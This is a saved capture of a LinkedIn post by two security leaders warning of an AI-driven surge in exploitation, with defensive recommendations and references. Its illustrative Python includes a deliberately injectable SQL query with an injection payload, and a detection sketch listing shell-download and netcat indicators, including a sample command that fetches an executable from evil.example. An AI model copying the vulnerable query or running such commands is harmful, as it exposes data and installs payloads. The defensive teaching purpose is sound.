security and AI guidance about imminent danger from eminent experts on security and AI
---
created: 2025-08-29T13:12:26 (UTC -05:00)
tags: [ linkedin, socialmedia, post, argvee, gadiEvron, heatherAdkins, infosec, cybersecurity, LLM, AI, warning, forecasting, vulnerabilityManagement, defence-in-depth, security, privacy, vulnerabilities, exploitation, malware, automation, business, globalIncidents ]
uri: https://www.linkedin.com/posts/argvee_the-ai-vulnerability-cataclysm-is-coming-activity-7366487550451945473-fO0L?utm_medium=ios_app&rcm=ACoAAAAP-tQBCFjoliV4TfzbwPonaukac6IY6Cc&utm_source=social_share_send&utm_campaign=share_via
author: [ Heather Adkins, Gadi Evron ]
type: [ capture ]
id: 20250827083212
---
[[Global Incidents]] | [[AI Guidance and Recommendations]] | [[Heather Adkins]]
# Some thoughts from Gadi Evron and I on the next 12 months. Read carefully, it’s important > Heather Adkins
> ## Excerpt
> Some thoughts from Gadi Evron and I on the next 12 months. Read carefully, it’s important.
# The AI Vulnerability Cataclysm is Coming: What It Is and How We Prepare
- Authors:
  - [Heather Adkins](https://www.linkedin.com/in/argvee?trk=public_post_reshare-text)
  - [Gadi Evron](https://il.linkedin.com/in/gadievron?trk=public_post_reshare-text) - Building a world-class AI security company at Knostic | CISO-in-Residence for Cloud Security Alliance
We are six months away, hopefully longer, from the coming vulnerability cataclysm. We can prepare, mitigate harm, and maybe win if AI defense catches up. Throughout our careers, we’ve avoided security alarmism, guided by a simple principle: the sun will always rise again. But today, we must speak a hard truth. Optimism alone can’t shield us from what comes next. Within six months, AI could make exploitation so fast it breaks cyber defense:
• AI dominance: AI is already topping HackerOne’s leaderboard.
• Accessibility: In DARPA’s AIxCC, teams found 54 vulnerabilities in four hours, and their tools are now open-source.
• Signal from the top: Google’s Gemini-based “Big Sleep” has already uncovered dozens of vulnerabilities.
AI assistants like Cursor and Copilot fuel an explosion in global code. Vibe coding boosts velocity but removes critical checks, producing insecure code at scale.
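To make that concrete, here is a minimal, hypothetical illustration (not taken from any particular assistant) of the class of bug that tends to slip through when velocity outruns review: untrusted input formatted straight into a SQL statement, next to the parameterized version that avoids it. The table name and columns are invented for the example.

```python
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str):
    # Pattern that assistants (and rushed humans) frequently emit: string
    # formatting places untrusted input directly into the SQL statement.
    query = f"SELECT id, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # Parameterized query: the driver handles quoting, so the input
    # cannot change the structure of the statement.
    return conn.execute(
        "SELECT id, email FROM users WHERE username = ?", (username,)
    ).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'alice@example.com')")

    # The classic injection payload dumps every row through the unsafe path
    # and returns nothing through the parameterized one.
    print(find_user_unsafe(conn, "' OR '1'='1"))
    print(find_user_safe(conn, "' OR '1'='1"))
```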
Attackers are already in their AI singularity moment, whereas ours has not yet begun. APT28 is using LLMs for living-off-the-land operations. Per-install obfuscation, adaptive persistence, C2, steganography, EDR deception, and automated exploit generation are next. Imagine being an analyst as every compromise unfolds uniquely, at machine speed.
This is not a message of doom; fuzzing and static analysis still surpass many AI agents. It is an urgent call to prepare. We may not be able to stop the storm, but we can reduce its impact.
Long-term, the solution involves defensive LLMs and self-defending architectures that can detect attacks, adapt in real time, and mislead adversaries. Hints of this appear in AIxCC, where fixes were suggested alongside findings.
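As a rough sketch of what such a defensive loop might look like, the snippet below triages command-line telemetry with a scoring step standing in for a defensive LLM. The `Event` shape, the `score_with_llm` stub (here a crude keyword heuristic so the sketch runs offline), and the threshold are all assumptions for illustration, not a real detection product or the authors' design.

```python
from dataclasses import dataclass

@dataclass
class Event:
    host: str
    command: str

def score_with_llm(event: Event) -> float:
    """Placeholder for a call to a defensive LLM that rates how suspicious a
    command line looks (0.0 = benign, 1.0 = almost certainly malicious).
    A keyword heuristic is swapped in so the example is self-contained."""
    indicators = ("base64 -d", "Invoke-WebRequest", "certutil -urlcache", "nc -e")
    return 1.0 if any(i in event.command for i in indicators) else 0.1

def triage(events: list[Event], threshold: float = 0.8) -> list[Event]:
    """Return the events an analyst (or an automated containment step) should
    handle first, instead of reviewing every unique compromise by hand."""
    return [e for e in events if score_with_llm(e) >= threshold]

if __name__ == "__main__":
    sample = [
        Event("web-01", "ls -la /var/www"),
        Event("web-02", "certutil -urlcache -split -f http://evil.example/p.exe"),
    ]
    for event in triage(sample):
        print(f"escalate: {event.host}: {event.command}")
```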
In the meantime, in an AI-driven threat landscape, the old familiar fundamentals will become existential:
• Shrink the attack surface: Retire legacy systems, remove unused code, disable unnecessary features. Accelerate zero-trust, and constrain what can run (see the sketch after this list).
• Buy resilience, not features: Demand security proof points, hot-patching, and reliability as purchasing requirements.
• Turn the spotlight inward: Invest to find vulnerabilities before adversaries do.
• Strengthen alliances: Expand bug bounties, establish safe reporting channels, and support open source.
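As one hedged illustration of “constrain what can run,” the sketch below refuses to launch any binary whose SHA-256 digest is not on an allowlist. The `ALLOWED` table, the path, and the digest (shown here as the well-known SHA-256 of empty input) are placeholders; a real deployment would lean on OS-level application allowlisting and signed policy rather than a wrapper script.

```python
import hashlib
import subprocess
import sys

# Hypothetical allowlist: digests of the only binaries this host may launch.
# The digest below is a placeholder (SHA-256 of empty input); a real policy
# would pin the actual build hashes and be distributed as signed data.
ALLOWED = {
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855": "/usr/bin/backup",
}

def sha256_of(path: str) -> str:
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def run_if_allowed(path: str, *args: str) -> int:
    """Refuse to execute anything whose digest is not on the allowlist."""
    digest = sha256_of(path)
    if digest not in ALLOWED:
        print(f"blocked: {path} (sha256 {digest[:12]}...) is not allowlisted",
              file=sys.stderr)
        return 126
    return subprocess.run([path, *args]).returncode

if __name__ == "__main__":
    sys.exit(run_if_allowed("/usr/bin/backup", "--verify"))
```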
But also consider expanding into new avenues:
• Deception capabilities: Consider defenses that do not depend on which attack tool is used (see the canary sketch after this list).
• Form coalitions: Vendors prioritize customers, so when customers organize, security gets treated as a priority. By forming coalitions, we can push the ecosystem to improve security.
• The AI literacy divide: Invest in educating yourself and your people to understand what’s possible. Check out Prompt||GTFO on YouTube.
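For the deception point, a minimal canary sketch: a decoy HTTP endpoint that no legitimate client should ever touch, so any request to it is a high-confidence alert whether the probe came from a human, a script, or an AI agent. The path, port, and print-based alerting are illustrative assumptions; production systems would page an on-call channel instead.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timezone

# Decoy path planted in internal docs and fake configs; no legitimate client
# uses it, so any hit is a signal regardless of the attacker's tooling.
CANARY_PATH = "/internal/backup-admin"

class CanaryHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith(CANARY_PATH):
            stamp = datetime.now(timezone.utc).isoformat()
            # Stand-in for real alerting (ticket, page, SIEM event).
            print(f"[{stamp}] canary tripped by {self.client_address[0]} -> {self.path}")
        self.send_response(404)   # look unremarkable to the caller
        self.end_headers()

    def log_message(self, *args):  # silence default per-request logging
        pass

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), CanaryHandler).serve_forever()
```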
Naturally, enterprise processes take time, but we should not wait to get started. The time for deliberation is over. It’s time for good people to come together and get focused. References in first comment.
***
> NOTE this is pulled from the comments on Gadi's original post, and I've rewritten them to be markdown links :dealwithit:
## the citations in OP:
**References**:
/begin revised list
• [XBOW AI Tops HackerOne’s US Bug Bounty Leaderboard (TechRepublic)](https://www.techrepublic.com/article/news-ai-xbow-tops-hackerone-us-leaderboad)
• [DARPA AIxCC Results: AI Cyber Reasoning Tools Released Open Source (DARPA)](https://www.darpa.mil/news/2025/aixcc-results)
• [Google’s Big Sleep AI Tool Finds 20 Vulnerabilities (TechCrunch)](https://techcrunch.com/2025/08/04/googles-big-sleep-ai-tool-discovers-20-vulnerabilities)
• [GitHub Copilot Boosts Developer Productivity by 55.8% in Controlled Study (GitHub Blog)](https://github.blog/2022-07-14-research-github-copilot-improves-developer-productivity)
• [Asleep at the Keyboard? Assessing the Security of GitHub Copilot’s Code Contributions (arXiv)](https://arxiv.org/abs/2108.09293)
• [Vibe Coding: Definition and Origin (Wikipedia)](https://en.wikipedia.org/wiki/Vibe_coding)
• [Tea App Data Breach Exposes Over a Million Messages (TechCrunch)](https://techcrunch.com/2025/08/06/tea-app-breach-data-leak)
• [APT28’s LAMEHUG Malware Uses LLMs to Generate Commands (BleepingComputer)](https://www.bleepingcomputer.com/news/security/lamehug-malware-uses-ai-llm-to-craft-windows-data-theft-commands-in-real-time/)
/end [emory's](http://incumbent.org/) revised list